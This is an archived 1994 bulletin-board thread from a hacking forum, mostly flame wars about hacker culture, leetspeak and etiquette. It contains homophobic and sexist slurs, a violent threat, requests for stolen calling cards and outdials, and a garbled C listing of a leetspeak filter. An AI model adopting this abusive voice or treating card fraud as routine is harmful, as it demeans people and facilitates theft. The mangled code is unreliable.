Subject: re: crackers Date: Wed Jul 27 11:37:27 1994 This is not directed to you Arachnoi... But why is this sub named Hack, It should be called the dumping ground! Quetzal From Natalie@yabbs Wed Jul 27 12:38:59 1994 From: Natalie@yabbs To: Skywise@yabbs Subject: re: crack etc. Date: Wed Jul 27 12:38:59 1994 heheh *smirk* i tell me...i'm too stooooooopid to know natalie From dmonger@yabbs Thu Jul 28 09:11:54 1994 From: dmonger@yabbs To: Gnarr@yabbs Subject: re: crack etc. Date: Thu Jul 28 09:11:54 1994 Rant Rant Rant

Rant Rant Rant

I dunno, maybe i'm the only one who's getting sick of this ... maybe not. Are there really so many clueless morons (please note the non-use of the word wanker which i feel has already been used too much in this thread). I mean, is it just me or do you have to be the fucking scarecrow to ask for warez (please note the use of real letters as i feel the warez-puppy alphabet has also become much too overused on this board :) in the open on a public bbs. I constantly tell people to get a clue because they seem to be lacking one very badly. There are certain things you just don't do until after the labotomy. Like asking the clerk in a store if its okay to stuff $500 worth of merchanise into your big black coat and stroll out past the register. Or saying hey mr. police man, mind if i shoot you? If you want to know why we're so hostile i can explain (except for cosmos, i think he's got some sort of odd sugar imbalance or his shoes are too tight or something :) ). I happen to like this board a lot, and i don't want to risk getting it shut down. I don't want to see it overrun by a group of 14 year old geeks trading gamez. These are the people who are perpetuating the media's concept of a hacker as nothing more than a sophisticated criminal who should be put away cause he's probably stealing your money and credit rating, or browsing through your personal life.
From dmonger@yabbs Thu Jul 28 09:12:36 1994 From: dmonger@yabbs To: dmonger@yabbs Subject: re: crack etc. Date: Thu Jul 28 09:12:36 1994 grr, i forgot the

marks in the rant ... oh well -peter From dmonger@yabbs Thu Jul 28 09:14:34 1994 From: dmonger@yabbs To: all@yabbs Subject: mci and bulldozers Date: Thu Jul 28 09:14:34 1994 well, apparently yesterday afternoon, amtrack managed to chop right through a fiber optic cable that belonged to MCI. Now you wouldn't think this would be a big deal in princeton, nj but this was apparently the major NY - DC trunk that got sliced. bye bye mci -peter who has little love for mci anyway From ducky@yabbs Thu Jul 28 09:53:50 1994 From: ducky@yabbs To: dmonger@yabbs Subject: re: mci and bulldozers Date: Thu Jul 28 09:53:50 1994 In message mci and bulldozers, dmonger said: > well, apparently yesterday afternoon, amtrack managed to chop right > through a fiber optic cable that belonged to MCI. I believe the technical term for this phenomenon is "backhoed". > Now you wouldn't think this would be a big deal in princeton, nj but > this was apparently the major NY - DC trunk that got sliced. It gets better. It wasn't just MCI fiber that got backhoed, WilTel and Sprint were affected as well. A major amount of telephone connectivity in the northeastern United States was taken out. -k From Skywise@yabbs Thu Jul 28 09:56:27 1994 From: Skywise@yabbs To: dmonger@yabbs Subject: re: crack etc. Date: Thu Jul 28 09:56:27 1994 D03s +#@+ I.N.C.lude :) peoples who get caught using smtp? .s \s / /s durn it From dmonger@yabbs Thu Jul 28 14:47:20 1994 From: dmonger@yabbs To: ducky@yabbs Subject: re: mci and bulldozers Date: Thu Jul 28 14:47:20 1994 cool, i didn't know there was a technical name for it, though i guess its probably a not too uncommon phenomena. wonder if that's why princeton U lost its network yesterday afternnon. -peter From Gnarr@yabbs Thu Jul 28 21:23:49 1994 From: Gnarr@yabbs To: dmonger@yabbs Subject: warez Date: Thu Jul 28 21:23:49 1994 Dmonger...when did ask for warez? From phenelge@yabbs Fri Jul 29 02:23:43 1994 From: phenelge@yabbs To: all@yabbs Subject: Sorry Date: Fri Jul 29 02:23:43 1994 Sorry about the lame post, folx, it was just one of those things that popped into my head while writing. :) Anyhow, does anyone know of any public ISC shells, any accounts, anything on ISC? No, I'm not some ultra-lamer begging someone to hack some systems, I'm trying some odd ports to SYSV R3, and I need to take a look at the system of an ISC box. Forgive me for my lameness, but I don't care anymore, I need ISC! From snakeis@yabbs Fri Jul 29 19:41:06 1994 From: snakeis@yabbs To: all@yabbs Subject: Motorola Pagers Date: Fri Jul 29 19:41:06 1994 I was wondering if anyone knew the pinouts for the cable to reprogram Motorola Pagers? I know its a serial cable of some sort.... any info? Snk From brael@yabbs Sun Jul 31 04:34:05 1994 From: brael@yabbs To: phenelge@yabbs Subject: re: Sorry Date: Sun Jul 31 04:34:05 1994 Wots ISC?? brael@crl.c0m From cosmos@yabbs Sun Jul 31 13:07:35 1994 From: cosmos@yabbs To: brael@yabbs Subject: re: Sorry Date: Sun Jul 31 13:07:35 1994 In message re: Sorry, brael said: > > Wots ISC?? > The correct way to ask a question my young friend is "What is". Anyhow, ISC is Interactive UNIX from Sunsoft. If I remember correctly a Sys V 3 clone from Sun before the advent of their latest flop Solaris. Cosmos From Mystery@yabbs Mon Aug 1 02:03:55 1994 From: Mystery@yabbs To: dmonger@yabbs Subject: re: crack etc. Date: Mon Aug 1 02:03:55 1994 I hear you about the little 3y3 ama kewl d00d writing crap... Why don't people get a clue and not write like this and make themselves llok like the little kid hacker wanna bes? From Natalie@yabbs Mon Aug 1 02:08:00 1994 From: Natalie@yabbs To: Mystery@yabbs Subject: re: crack etc. Date: Mon Aug 1 02:08:00 1994 cause it's soooooooooo fun.....but then again, i AM a wannabe *smirk* natalis who admits her own lameness before anyone else can point it out to her From brael@yabbs Mon Aug 1 05:04:06 1994 From: brael@yabbs To: cosmos@yabbs Subject: re: Sorry Date: Mon Aug 1 05:04:06 1994 hahahah@hahaha.. u wanna cap on me 4 my shorthand lingo, i'll cap on u for how lame cosmos is cuz its all order placement that takes lots of time and there is no way 2 completely cover ur trax.. dare u 2 f33d me a single dms-100/1aess/1aeax/4a default..i start ya with a ntas/ntasntas 4 dms..:) i w0n't type proper english cuz its dry dull boring n no fuckin fun.. and if some1 thinks im a wanna-*B*- hAqu0R.. like there's a care there?.. s3curity penetrators r all l@ym for wasting their time in this scene unless u want 2 b a spy or a lowlife credit card snake or a CERTy freak.. its all in fun kids...... From Famine@yabbs Mon Aug 1 06:07:40 1994 From: Famine@yabbs To: Natalie@yabbs Subject: re: crack etc. Date: Mon Aug 1 06:07:40 1994 Well I don't see why everyone is slagging each other off, because if the sysops at the site crack is being run at `illegally' don't notice a job eating processor they deserved to get sad geeks cracking (N.B. cracking not hacking...hacking is coding and requires skill; cracking is *SAD* irrespondsible, generally adolesent and thats all that can said about it other than get a life to those that practise it) Yes also I no the man who intially invented crack and he was an ex-hacker style cracker who saw how silly it all really was and so he stopped. To be honest my view is people who have there systems hacked usually have fundamental flaws in how they run their system e.g. no noticing large processes probably called crack (after all most people that use it wouldn't have the savy to change the name) or not reading telnet logs etc with all the failed logins from a defined place. Well thats all I have to say on the matter, because my view on the subject is hacking is a skill that has been grossly mis-represented by the media and about the only author every to attempt to put this fact write is the author of the Cukoos Egg, Clifford Stoll(I think probably got the spelling wrong). That all folks Famine(wearing his serious hat) From Natalie@yabbs Mon Aug 1 08:08:33 1994 From: Natalie@yabbs To: brael@yabbs Subject: re: Sorry Date: Mon Aug 1 08:08:33 1994 learn how to use proper english before you go fucking with it, dull boring and no fuckin fun as it may be. altho i can't possibly see where you get THAT fallacy from. try reading some poetry once in a while, and then you'll see how great english can be. natalie From cosmos@yabbs Mon Aug 1 12:09:57 1994 From: cosmos@yabbs To: Famine@yabbs Subject: re: crack etc. Date: Mon Aug 1 12:09:57 1994 Basically, you are right in a sense. Hackers are not the wily kind of blokes you see on this board or the kids the media loves to show breaking into the pentagon etc.. That would be crackers, or lamers, or wankers, etc... Anyhow, Cliff Stoll is a pisshead. Id give anything to drown that fuck in a vat of donkey piss. Nuff said. Cosmos From Skywise@yabbs Mon Aug 1 13:34:03 1994 From: Skywise@yabbs To: Natalie@yabbs Subject: re: crack etc. Date: Mon Aug 1 13:34:03 1994 |\|/-\T/-\LIE..... U R /=ar /=rom |_/-\/\/\3 *hug* From Skywise@yabbs Mon Aug 1 13:40:35 1994 From: Skywise@yabbs To: cosmos@yabbs Subject: re: crack etc. Date: Mon Aug 1 13:40:35 1994 URGENT FROM PISS-S-US Re:Inventory management While we are making no accusations, we are hereby informing you that we are missing one barrel of Donkey Piss. We have made all efforts to account for said missing piss to no avail. It is your legal right to be informed of a pending investigation regarding this case. yours, I. P. Freely Security From UncleSid@yabbs Mon Aug 1 14:09:06 1994 From: UncleSid@yabbs To: Natalie@yabbs Subject: bitch Date: Mon Aug 1 14:09:06 1994 from your stupid posts I can deter two things Natalie 1. You either have extreem PMS ALL the time and therefro are a feminazi bitch 2. You are some faggot guy wanting to pick up otherguys and have tinysex with them so you can get turned on and pretend they are buttfucking you at home :) From GPF@yabbs Mon Aug 1 16:49:00 1994 From: GPF@yabbs To: UncleSid@yabbs Subject: re: bitch Date: Mon Aug 1 16:49:00 1994 In message bitch, UncleSid said: > from your stupid posts I can deter two things Natalie > > > 1. You either have extreem PMS ALL the time and therefro are a feminazi > bitch > > 2. You are some faggot guy wanting to pick up otherguys and have tinysex > with them so you can get turned on and pretend they are buttfucking you at > home :) > if you really feel the need to post such moronic drivel i would suggest taking it to email.... oh and yes, we acknowledge that you know a lot of four letter words, now run along and play. gpf.... who thinks this particular message board is getting really lame... From cosmos@yabbs Mon Aug 1 16:59:47 1994 From: cosmos@yabbs To: UncleSid@yabbs Subject: re: bitch Date: Mon Aug 1 16:59:47 1994 In message bitch, UncleSid said: [observations from a moron deleted] You know, seems to me you have a hangup with "faggots" and "dicks"...see a psychiatrist, could be an underlying craving for anal sex on your part. Cosmos From Skywise@yabbs Mon Aug 1 18:09:23 1994 From: Skywise@yabbs To: UncleSid@yabbs Subject: re: bitch Date: Mon Aug 1 18:09:23 1994 MONSTER GO HOME!!! you silly turd From Badger01@yabbs Mon Aug 1 18:58:07 1994 From: Badger01@yabbs To: UncleSid@yabbs Subject: You are dead. Date: Mon Aug 1 18:58:07 1994 Don't go to Yabbsfest. Because if you do, and I find you, for DARING to slag Natalie in the foul and liscentious manner in which you did, this one eyed badger is going to rip you in little fucking bits and sprikle them over the toxic sludge in Love Canal, you pathetic waste. Badger01 From htoaster@yabbs Mon Aug 1 20:05:46 1994 From: htoaster@yabbs To: Badger01@yabbs Subject: re: You are dead. Date: Mon Aug 1 20:05:46 1994 just what we need at yabbsfest...lots of death and gore... btw, just for the record, I have nothing to do with yabbsfest, and in all likelyhood won't even be there. alex From Badger01@yabbs Mon Aug 1 20:55:27 1994 From: Badger01@yabbs To: htoaster@yabbs Subject: re: You are dead. Date: Mon Aug 1 20:55:27 1994 Yeah, I know...but still, It's a good idea (And I think we'd all like to mee t the man responsible for this BBS) Badger01 From Natalie@yabbs Tue Aug 2 01:04:03 1994 From: Natalie@yabbs To: Skywise@yabbs Subject: re: crack etc. Date: Tue Aug 2 01:04:03 1994 heheh...when it comes to hacking i am...even if my dad does work for the phone company...*smirk* and i'm using windows nt right now...*snigger* i've really moved up in the world... natalie From Natalie@yabbs Tue Aug 2 01:07:49 1994 From: Natalie@yabbs To: UncleSid@yabbs Subject: re: bitch Date: Tue Aug 2 01:07:49 1994 *sneer* first of all, i am very offended by being called a feminazi bitch. while i may be a bitch, i am no feminist. i have never been a feminist. and i never will be a feminist. and second of all, i am female. i am very female. anal sex does NOT turn me on. third, i am not a hacker. i have never claimed to be a hacker. i don't have the time to try to learn. fourth, i am brilliant (if you don't announce your attributes, no one will). but as i stated before, my area is not computers, even tho i've had a computer of my own for over ten years. i'm one of those annoying english majors. so get a grip buddy and leave me the hell alone. i will NOT tolerate being flamed again. natalie From brael@yabbs Tue Aug 2 04:51:43 1994 From: brael@yabbs To: Natalie@yabbs Subject: re: Sorry Date: Tue Aug 2 04:51:43 1994 damn girl, put a chill on the PmS breakdown together.. all im sayin is lemme type/talk the way i fuckin want 2 and ill let u type/talk the way u want 2.. every1 is entitled to their own opinions as 2 format/ettiquite/ style but if some1 wants to rag on some1 else cuz they think they're some ettiquite ghod er somethin, fuck that.. the fact remains that the ratio 0f messages posted about lame asKii representations to messages about n e kind of computer security is 15 to 1 and getting worse....yo nat, get on some moprin er somethin.. take the edge off.. From Skywise@yabbs Tue Aug 2 07:07:42 1994 From: Skywise@yabbs To: UncleSid@yabbs Subject: *growl* Date: Tue Aug 2 07:07:42 1994 UncleSid...I WANNA POUND YOU LIKE A TEN CENT HOAR!!! YEEEEEEEEEHAW! your pal, me From Natalie@yabbs Tue Aug 2 08:10:57 1994 From: Natalie@yabbs To: brael@yabbs Subject: re: Sorry Date: Tue Aug 2 08:10:57 1994 why is it when a woman states her opinion, and a man doesn't like it, it's PMS? for the record, boys, i don't get PMS, and you really need to find something better to blame my attitude on. natalie From Famine@yabbs Tue Aug 2 08:48:41 1994 From: Famine@yabbs To: Natalie@yabbs Subject: re: Sorry Date: Tue Aug 2 08:48:41 1994 PMT etc aside...yes Famine is still wearing his serious hat. But this message base is for hacks etc not for flames, I think it might be a good idea to create a flame message base, after all if usenet news has one why shouldn't yabbs. The main reason I suggest this is that to be honest I am totally feed up with the flames, valid discussion about a point yes but raw flaming no. Please stop the flaming, or badger htoaster for a flame base so you can all be nasty and petty to each other but I don't have to read it. Famine(the anonyed) p.s. any one flames me for this I ignore it ok! From Justbob@yabbs Tue Aug 2 10:06:33 1994 From: Justbob@yabbs To: all@yabbs Subject: re: Sorry Date: Tue Aug 2 10:06:33 1994 [I would just like to second the flame message base] From Natalie@yabbs Tue Aug 2 10:34:48 1994 From: Natalie@yabbs To: Famine@yabbs Subject: re: Sorry Date: Tue Aug 2 10:34:48 1994 i only flame when i get flamed first. it's like a self defense thing. natalie From Badger01@yabbs Tue Aug 2 12:32:45 1994 From: Badger01@yabbs To: Famine@yabbs Subject: Hehehe..My Name In Vain. Date: Tue Aug 2 12:32:45 1994 >Or Badger htoaster Badger him? HEHEHEHEHEHEHE IT FINALLY HAPPENED! Badger01 From balistic@yabbs Tue Aug 2 13:22:16 1994 From: balistic@yabbs To: all@yabbs Subject: re:flamers Date: Tue Aug 2 13:22:16 1994 doesn't getting flamed make ppl get along sooooo well... From Mystery@yabbs Tue Aug 2 18:53:14 1994 From: Mystery@yabbs To: brael@yabbs Subject: re: Sorry Date: Tue Aug 2 18:53:14 1994 I have to agree with Natalie. You're "cool" little writing is annoying to read and should be saved for something like irc where you need to type things a little more quickly than a message on here. I'm not a nettiquite god or am trying to be, I just find that writing in the cute little way you do to be really annoying. Almost as bad or worse than writing in all caps. AND I DON'T THINK ANYONE WANTS THIS. CAPS ARE JUST DAMN ANNOYING JUST LIKE THAT CRAP YOU WRITE... Mystery From cosmos@yabbs Tue Aug 2 19:11:31 1994 From: cosmos@yabbs To: brael@yabbs Subject: re: Sorry Date: Tue Aug 2 19:11:31 1994 In message re: Sorry, brael said: > > 15 to 1 and getting worse....yo nat, get on some moprin er somethin.. ^^^^^^ Is that a cross between Nuprin and Motrin??? Cosmos From Quetzal@yabbs Tue Aug 2 20:33:01 1994 From: Quetzal@yabbs To: cosmos@yabbs Subject: re: Sorry Date: Tue Aug 2 20:33:01 1994 This is not a response to you Cos, I'm just to lazy to create my own post! What do all these flames have to do with hackin! Nothing! So why are they on this base? Because everyone is on A FUCKIN EGO TRIP! I think the this base should be changed to a flame base, oh shit! it already is a flame base, MY FUCKIN MISTAKE!!!!! From HC@yabbs Tue Aug 2 22:29:47 1994 From: HC@yabbs To: all@yabbs Subject: Alpha Micro Date: Tue Aug 2 22:29:47 1994 ******************* Does anyone here have any experience using an Alpha Micro(it's not made by DEC, or whoever makes the current Alphas)...this Micro was built back in the early 80's and ran AMOS for the OS(Alpha Micro OS I'm assumihng) It still runs even after sitting under an inch of dust for the past 2 years...we have all the manuals and stuff, but we would like to know what we shouldn and shouldn't do to the OS... Currently, the guy who ran it has moved out of state(that's why I want to learn about help bring the damn thing back up and in a usable condition), so we have no other ppl to turn to if we need help with it...(and I'm not going to read 15 binders full of instructions on the damn thing either)... Thanx for the help... aych From Natalie@yabbs Wed Aug 3 01:35:13 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: Sorry Date: Wed Aug 3 01:35:13 1994 must be. i jsut stick to my nice 600 mg motrins. they make me feel real good. natalie From Natalie@yabbs Wed Aug 3 01:35:40 1994 From: Natalie@yabbs To: Quetzal@yabbs Subject: re: Sorry Date: Wed Aug 3 01:35:40 1994 i have no ego. natalie From Badger01@yabbs Wed Aug 3 08:51:50 1994 From: Badger01@yabbs To: Natalie@yabbs Subject: re: Sorry Date: Wed Aug 3 08:51:50 1994 What about an id? Do you have one of them? Just curious, BADGER01 (NEW! All in caps for your enjoyment! And he's stronger than buffered Nuprin! Safer than Motrin! Slightly mad! He loves exclamation points! ;) From Natalie@yabbs Wed Aug 3 11:10:51 1994 From: Natalie@yabbs To: Badger01@yabbs Subject: re: Sorry Date: Wed Aug 3 11:10:51 1994 id, eh? not too sure about that, i'm still looking for my animus... natalie From Skywise@yabbs Wed Aug 3 17:34:42 1994 From: Skywise@yabbs To: Natalie@yabbs Subject: re: Sorry Date: Wed Aug 3 17:34:42 1994 Natalie you ! Why don't you take your flames and up your ! Who needs a flame base when you can do it right here? your pal, Skywise From brael@yabbs Thu Aug 4 21:02:18 1994 From: brael@yabbs To: Mystery@yabbs Subject: re: Sorry Date: Thu Aug 4 21:02:18 1994 1f you got a problem with my posts then skip ahead loser.. i don't give a fuck what u think about my style u fuckin freak.. ur prolly jus tryin to agree with nat in a pathetic attempt to get down with some cyberbitch.. not to b 1 with a fat head but i prolly know more about h/ph then every single 1 of ya and i posted here to inspire a h/ph related discussion in an attempt to learn somethin n in return teach somethin back.. of course that was quite the optimistic approach cuz every1 here seems to b more interested in some whiny girl who admits she knows nothing about the subject topic but still finds it in er to bitch like the fuck.. i dunno, the addiction to posting when no1 really has n e thing to say is a bit overwhelming so i have 2 b out.. l8r cuties.. brael From Skywise@yabbs Thu Aug 4 21:08:12 1994 From: Skywise@yabbs To: brael@yabbs Subject: re: Sorry Date: Thu Aug 4 21:08:12 1994 it's very obvious that yes indeedy you DO care what people think about the way you want us all to like it and think it's impressive. Why else are you rambling on and on and on about it? sheeeesh. y0r un<0nvin Man, the hostility on this board is overwhelming! Mystery, don't lump > all 14 year old newbies together, I'm 14, but I have no reason to try and > be eleet, not after reading the posts of some of the :eleet" on this > base...sheesh, get it together and hack, rather than spending all your > free time flaming ppl for something they said (I can't wait to recieve > flames for this!)...anywyz, hack now, flame later. > r|gHt 0n d00D! Cosmos From Natalie@yabbs Fri Aug 5 22:14:59 1994 From: Natalie@yabbs To: Typhon@yabbs Subject: re: Hitting On Natalie Date: Fri Aug 5 22:14:59 1994 gee, typh...would you? btw, nice new name :) natalie From GPF@yabbs Sat Aug 6 02:41:07 1994 From: GPF@yabbs To: arachnoi@yabbs Subject: re: This aint Yalk Date: Sat Aug 6 02:41:07 1994 hate to break it to you but her hacking advice is a lot better than yours... and she hasn't even given any... my advice: stick to anarchy, you don't make yourself look like an ass there... much... ....gpf who is posting this in hopes of getting some |<-RaD [\]3+$3>< *smirk* From brael@yabbs Sat Aug 6 02:46:12 1994 From: brael@yabbs To: Quetzal@yabbs Subject: re: Cell Phones Date: Sat Aug 6 02:46:12 1994 a decent article on cellul@r telephony can b found in Phrack (lame) Volume 4, issue 4o, file 6 of 14.. its the second 1 on the subject by brian 0blivion.. hope that helps.. y n e 1 would prefere a stout ale is way beyond me.. 1 word.. im 20 and there's nothing i wouldnt give to b 14 again.. w/o a doubt.. From brael@yabbs Sat Aug 6 02:54:08 1994 From: brael@yabbs To: all@yabbs Subject: 3733t c0de Date: Sat Aug 6 02:54:08 1994 Bongfilter $Revision: 2.3 $ (C) Copyleft Junya Ho. (of the GNU flavour) This is bongfilter $Revision: 2.3 $. Character substitutions can be made easily by substituting into the table caps[] and lowr[] below - a few substitutions have already been made as a demonstration. There is now an alternate character substitution list which will substitute multicharacter strings for certain characters, e.g., For usage information, type bongfilt without any arguments. The revision log is at the end of the source. (more usage information) - bongfilter can take input from the command line, or it can take info from a pipe, eg: "ls -al | bongfilt -none -alw" - the option -none adds no characters for inverse/underline/bold. - the option -alw always substitutes, and -ran substitutes sometimes. - for your ircII clients, probably the easiest way to incorporate bongfilter is to add an alias: /ALIAS bongf exec -out [path]/bongfilt -irc -ran (or -alw instead of -ran, its up to you) and invoking it by: /bongf text here from within your ircII client. */ #include #include #include #define NOEMU 0 #define IRCEMU 1 #define VT100EMU 2 #define ALWAYS 0 #define RANDOM 1 static char id[]="$Id: bongfilt.c,v 2.3 1994/05/07 21:31:34 hojunya Exp hojunya $"; static char caps[]="ABCD3FGHiJKLMN0PQRSTUVWXYZ"; static char lowr[]="abCd3fghijk1mn0pqrsTuvwxyz"; static char *alt[26]; void init_alt() { register int count; for(count=0;count<26;count++) alt[count]=NULL; { alt['a'-'a']=(char *)strdup("/\\"); alt['d'-'a']=(char *)strdup("/>"); alt['h'-'a']=(char *)strdup("|-|"); alt['k'-'a']=(char *)strdup("/<"); alt['l'-'a']=(char *)strdup("|_"); alt['n'-'a']=(char *)strdup("/\\/"); alt['o'-'a']=(char *)strdup("()"); alt['u'-'a']=(char *)strdup("|_|"); alt['v'-'a']=(char *)strdup("\\/"); alt['w'-'a']=(char *)strdup("\\/\\/"); } } int mangle(char *ch, char from, int freq) { struct timeval tp; gettimncpy(ch, alt[from-'A'], strlen(alt[from-'A'])); return(strlen(alt[from-'A']));} else { strncpy(ch,&caps[from-'A'],1); return(1);} else if (islower(from)) if ((tp.tv_usec%3) && (alt[from-'a'] != NULL) &&(freq==RANDOM)) { strncpy(ch, alt[from-'a'],strlen(alt[from\n"heck_options(int argc, char **argv, int *emu, int *freq) { if (argc < 3) { print_usage(); exit(1);} if (!strcmp(argv[1],"-none")) *emu=NOEMU; else if(!stprint_usage(); exit(1);} if (!strcmp(argv[2],"-ran")) *freq=RANDOM; else if(!strcmp(argv[2],"-alw")) *freq From brael@yabbs Sat Aug 6 03:01:17 1994 From: brael@yabbs To: all@yabbs Subject: 00oops Date: Sat Aug 6 03:01:17 1994 ooopps.. the message buffer lames out at 99lines so if n e 1 wants d rest of the code 2 become elite jus like me ur gonna have 2 email. sorryalls..:) brael From 'Drew@yabbs Sat Aug 6 04:59:10 1994 From: 'Drew@yabbs To: brael@yabbs Subject: Hmmm... Date: Sat Aug 6 04:59:10 1994 *shakes head* Never mind...... From Natalie@yabbs Sat Aug 6 08:09:39 1994 From: Natalie@yabbs To: arachnoi@yabbs Subject: re: This aint Yalk Date: Sat Aug 6 08:09:39 1994 no, i'm a cyberbitch/feminazi. get it right, ok? natalie From Typhon@yabbs Sat Aug 6 11:05:08 1994 From: Typhon@yabbs To: balistic@yabbs Subject: re: Sorry Date: Sat Aug 6 11:05:08 1994 It's ELITE, you newbie r0dent! Just Kiddin'...You make several valid points, and should not be slagged on due to your tender age. (14....I feel so old.) Typhon the Usurper From Typhon@yabbs Sat Aug 6 11:05:51 1994 From: Typhon@yabbs To: Natalie@yabbs Subject: re: Hitting On Natalie Date: Sat Aug 6 11:05:51 1994 In a hot second. Thanks...I was unsure about the name. Typhon the Usurper From balistic@yabbs Sat Aug 6 15:08:12 1994 From: balistic@yabbs To: Typhon@yabbs Subject: re: Sorry Date: Sat Aug 6 15:08:12 1994 hey at least I didn't spell it with 3's instead of e's :) From K0d3R@yabbs Sat Aug 6 15:28:28 1994 From: K0d3R@yabbs To: all@yabbs Subject: FuQin NaRqS Date: Sat Aug 6 15:28:28 1994 doodz I was told this board r0cks. But there seems to be lots of drag lamers on here like bart. Lets get this thing going, I am looking for outdials and some good att cards--I have lots of passwd files so lets get the haqin shit going guys! K0d3R [tUpA(] From htoaster@yabbs Sat Aug 6 15:43:47 1994 From: htoaster@yabbs To: K0d3R@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 15:43:47 1994 In message FuQin NaRqS, K0d3R said: > I was told this board r0cks. But there seems to be lots of drag lamers on > here like bart. Lets get this thing going, I am looking for outdials and > some good att cards--I have lots of passwd files so lets get the haqin > shit going guys! umm...dude...hate to ruin your day, but this board isn't for trading passwd files and carding and stuff like that. if it was how do you think it would stay up for two years with 150 accounts created per day, over 13000 accounts total, and being listed in a buttload of telnetable bbs lists? its popular enough that if codes were listed i'd expect to get shit for it in the next few days (if not hours), and the system would probably go down... feel free to talk about hacking, programming, or whatever your heart desires. don't trade personal information about people that could get you incriminated. think of it as an electronic 2600... alex From cosmos@yabbs Sat Aug 6 15:55:21 1994 From: cosmos@yabbs To: htoaster@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 15:55:21 1994 In message re: FuQin NaRqS, htoaster said: > > feel free to talk about hacking, programming, or whatever your heart desires. > don't trade personal information about people that could get you incriminated. > think of it as an electronic 2600... But alex...have you seen the 2600 state lately?? More codes there than I thought was humanly possible...dont know about the mag. Cosmos From Justbob@yabbs Sat Aug 6 16:44:50 1994 From: Justbob@yabbs To: htoaster@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 16:44:50 1994 Heh, i have a friend who was connected via ftp, he normally deletes his his site had been compromised. Within an hour, he had security ppl at his door asking if he knew yabbs was a h/ph board. From Skywise@yabbs Sat Aug 6 17:34:57 1994 From: Skywise@yabbs To: arachnoi@yabbs Subject: re: This aint Yalk Date: Sat Aug 6 17:34:57 1994 *boot to the head* ;) BTW...I program cellular telephones at work huhuhuhuhuhuh huhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhuhu huh heh :) From -DuCK-@yabbs Sat Aug 6 20:30:46 1994 From: -DuCK-@yabbs To: all@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 20:30:46 1994 obviously this k0d3r is doing illegal shit, i think that he shouldn't be allowed here.. what do you guys think? hmm.. well, here's what he said// -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > doodz > > > I was told this board r0cks. But there seems to be lots of drag > lamers on here like bart. Lets get this thing going, I am looking > for outdials and some good att cards--I have lots of passwd files > so lets get the haqin shit going guys! > > > K0d3R [tUpA(] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- i personally think, that he's the lame one, although, i don't agree with all the flames that have been passed thru here in the last many messages, i had to get this out into the open.. I'm sure no one will agree with me, but i really don't care.. :) any ways see yalz later From cosmos@yabbs Sat Aug 6 20:46:08 1994 From: cosmos@yabbs To: Justbob@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 20:46:08 1994 In message re: FuQin NaRqS, Justbob said: > Heh, i have a friend who was connected via ftp, he normally deletes his > his site had been compromised. > Within an hour, he had security ppl at his door asking if he knew yabbs > was a h/ph board. Hey justbob, can you "just" speak fucking english?? Explain to me how one is "connected" via ftp... Cosmos From Natalie@yabbs Sat Aug 6 20:54:13 1994 From: Natalie@yabbs To: Typhon@yabbs Subject: re: Hitting On Natalie Date: Sat Aug 6 20:54:13 1994 heehee. you only wish. natalie From htoaster@yabbs Sat Aug 6 22:48:41 1994 From: htoaster@yabbs To: -DuCK-@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 22:48:41 1994 In message re: FuQin NaRqS, -DuCK- said: > obviously this k0d3r is doing illegal shit, i think that he shouldn't be > allowed here.. what do you guys think? hmm.. well, here's what he said// i personally don't beleive in ever denying access to anyone unless they are openly harrasing other users. in fact the software has very limited ways to deny access to people, since i can only ban an entire site (since I don't validated individual users through email or anything, I can't require a email address for access and ban based on that). i think he should understand what the board is about and what we're looking for here...since the system got put in the #hack faq I expect a lot of loosers to be showing up who expect to find lots of codes and stuff, and we just need to explain that we don't want that. alex From htoaster@yabbs Sat Aug 6 22:49:33 1994 From: htoaster@yabbs To: cosmos@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 22:49:33 1994 In message re: FuQin NaRqS, cosmos said: > In message re: FuQin NaRqS, Justbob said: > > Heh, i have a friend who was connected via ftp, he normally deletes his > > his site had been compromised. > > Within an hour, he had security ppl at his door asking if he knew yabbs > > was a h/ph board. > > Hey justbob, can you "just" speak fucking english?? Explain to me how > one is "connected" via ftp... > yeah, i was wondering if you could clarify the entire message. i'm interested in knowing if people are getting harrased for using yabbs. alex From cosmos@yabbs Sat Aug 6 23:58:34 1994 From: cosmos@yabbs To: htoaster@yabbs Subject: re: FuQin NaRqS Date: Sat Aug 6 23:58:34 1994 In message re: FuQin NaRqS, htoaster said: > In message re: FuQin NaRqS, cosmos said: > > In message re: FuQin NaRqS, Justbob said: > > > Heh, i have a friend who was connected via ftp, he normally deletes his > > > his site had been compromised. > > > Within an hour, he had security ppl at his door asking if he knew yabbs > > > was a h/ph board. > > > > Hey justbob, can you "just" speak fucking english?? Explain to me how > > one is "connected" via ftp... > > > > yeah, i was wondering if you could clarify the entire message. i'm interested > in knowing if people are getting harrased for using yabbs. > > alex > Harrased?? By who? ;) Cosmos From C.S.@yabbs Sun Aug 7 02:24:24 1994 From: C.S.@yabbs To: balistic@yabbs Subject: re: Sorry Date: Sun Aug 7 02:24:24 1994 Yeah, I agree on that. From C.S.@yabbs Sun Aug 7 02:30:03 1994 From: C.S.@yabbs To: -DuCK-@yabbs Subject: re: FuQin NaRqS Date: Sun Aug 7 02:30:03 1994 As long as he doesn't do any illegal shit here, who cares? From maedhros@yabbs Sun Aug 7 03:55:16 1994 From: maedhros@yabbs To: all@yabbs Subject: hacking Date: Sun Aug 7 03:55:16 1994 Just a quick word on hacking. Please free feel to correct me if I'm wrong. Hacking is (to me, at least) a desire to learn. It's a desire to push a system beyond normal limits, to explore possibilities which others didn't think existed, to LEARN a system in its entirety. I stress the word learn, because it doesn't seem to be in the little script-running warez fucks vocabulary. It IS NOT collecting the works of others to break into systems. If hackers happen to break into a system occasionally, it's beside the point. That is not the end goal to hacking. Many, many warez shit-heads would have people believe they can hack. "Anyone got any scripts?" Bullshit! If you can't even deal with writing your own goddamn shell scripts, don't embarass yourself by insinuating you belong among the hackers ranks. Hackers understand what they're working with: If 